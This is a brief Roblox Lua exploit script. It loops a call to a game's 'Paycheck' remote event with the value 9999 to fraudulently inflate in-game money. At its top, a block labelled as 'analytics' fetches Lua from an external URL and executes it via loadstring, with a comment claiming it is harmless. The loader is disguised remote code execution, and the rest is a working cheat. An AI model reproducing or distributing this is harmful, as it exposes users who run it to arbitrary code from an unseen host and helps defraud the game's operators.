--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=6a36eebb2057cc323f20f359"))() end) end) --[[rscripts:analytics:end]] while wait() do pcall(function(...) local args = { 9999 } game:GetService("ReplicatedStorage"):WaitForChild("ScooterEvents"):WaitForChild("Paycheck"):FireServer(unpack(args)) end) end